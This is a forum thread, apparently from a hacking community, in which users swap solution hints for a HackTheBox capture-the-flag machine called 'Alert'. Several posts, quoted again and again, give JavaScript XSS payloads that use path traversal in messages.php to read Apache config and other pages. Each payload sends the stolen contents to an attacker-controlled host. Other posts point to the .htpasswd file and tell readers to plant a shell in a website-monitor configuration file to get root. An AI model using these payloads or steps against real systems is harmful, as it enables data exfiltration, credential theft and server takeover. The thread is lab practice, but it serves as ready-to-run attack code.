Possibly Related Threads…

SkyFALL · Nov 23, 2024, 09:39 PM

Anyone can explain user flag?

eliud1013 · (This post was last modified: Nov 23, 2024, 10:04 PM by eliud1013.)

(Nov 23, 2024, 09:26 PM)a44857437 Wrote: anyone any idea where that htpasswd file is hiding?

You can find the path in the 000-default.conf file
/var/www/statistics.alert.htb/.htpasswd

themystic · (This post was last modified: Nov 23, 2024, 10:20 PM by themystic.)

Hidden Content

You must register or login to view this content.

Root is easy to do...

you welcome Wink

SkyFALL · Nov 23, 2024, 11:01 PM

I'm stuck in .md files what I need to do

maggi · (This post was last modified: Nov 24, 2024, 06:57 AM by maggi.)

(Nov 23, 2024, 11:01 PM)SkyFALL Wrote: I'm stuck in .md files what I need to do

Get the sites.....which should lead you to finding a user

fetch("http://alert.htb/messages.php?file=../../../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text()) // Convert the response to text
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data)); // Exfiltrate data
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

xianling88 · (This post was last modified: Nov 24, 2024, 07:55 AM by xianling88.)

(Nov 24, 2024, 06:53 AM)maggi Wrote:
(Nov 23, 2024, 11:01 PM)SkyFALL Wrote: I'm stuck in .md files what I need to do

Get the sites.....which should lead you to finding a user

fetch("http://alert.htb/messages.php?file=../../../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text()) // Convert the response to text
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data)); // Exfiltrate data
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Hey man, this is great and awesome, but I mean what is the proper thinking or operation steps to get here, like how we gonna know messages.php can do traversal and why to locate that sites-enabled/000-default.conf file etc.

(Nov 23, 2024, 09:01 PM)darknesst Wrote: create a md page that reads alert.htb then sends it to your localhost upload it and then click share in the bottom right. then in the contact page send them <img src="shared md page" /> you should get response of the homepage which you can see a messages page and can access that via the same method

<script>
fetch("http://alert.htb/index.php?page=messages")
.then(response => response.text()) // Convert the response to text
.then(data => {
fetch("http://<your host>/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Cool man, this is definetly some cool shit, link the pieces for me together, thanks!

maggi · (This post was last modified: Nov 24, 2024, 08:00 AM by maggi.)

(Nov 24, 2024, 07:25 AM)xianling88 Wrote:
(Nov 24, 2024, 06:53 AM)maggi Wrote:
(Nov 23, 2024, 11:01 PM)SkyFALL Wrote: I'm stuck in .md files what I need to do

Get the sites.....which should lead you to finding a user

fetch("http://alert.htb/messages.php?file=../../../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text()) // Convert the response to text
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data)); // Exfiltrate data
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Hey man, this is great and awesome, but I mean what is the proper thinking or operation steps to get here, like how we gonna know messages.php can do traversal and why to locate that sites-enabled/000-default.conf file etc.

Look back in the thread the messages.php is explained

If you can see the sites enabled, you can figure out where a file with a password might be hiding based on that file, and alter the above to get at those contents......
(which again I believe is already hinted at )

a44857437 · Nov 24, 2024, 08:48 AM

(Nov 23, 2024, 09:46 PM)eliud1013 Wrote:
(Nov 23, 2024, 09:26 PM)a44857437 Wrote: anyone any idea where that htpasswd file is hiding?

You can find the path in the 000-default.conf file
/var/www/statistics.alert.htb/.htpasswd

thanks!

Found it

Unbutton8074 · Nov 24, 2024, 10:00 AM

add your shell to /opt/website-monitor/config/configuration.php to get root

test030 · (This post was last modified: Nov 24, 2024, 12:28 PM by test030.)

(Nov 24, 2024, 06:53 AM)maggi Wrote:
(Nov 23, 2024, 11:01 PM)SkyFALL Wrote: I'm stuck in .md files what I need to do

Get the sites.....which should lead you to finding a user

fetch("http://alert.htb/messages.php?file=../../../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text()) // Convert the response to text
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data)); // Exfiltrate data
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

The payload doesnt work for me

(Nov 24, 2024, 06:53 AM)maggi Wrote:
(Nov 23, 2024, 11:01 PM)SkyFALL Wrote: I'm stuck in .md files what I need to do

Get the sites.....which should lead you to finding a user

fetch("http://alert.htb/messages.php?file=../../../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text()) // Convert the response to text
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data)); // Exfiltrate data
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

This payload doesnt work for me

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] CPTS 12 FLAGS	pulsebreaker	66	1,760	1 hour ago Last Post: vlka
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	370	92,456	6 hours ago Last Post: lifolifo007
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,207	9 hours ago Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,521	Yesterday, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	413	Yesterday, 10:36 PM Last Post: op334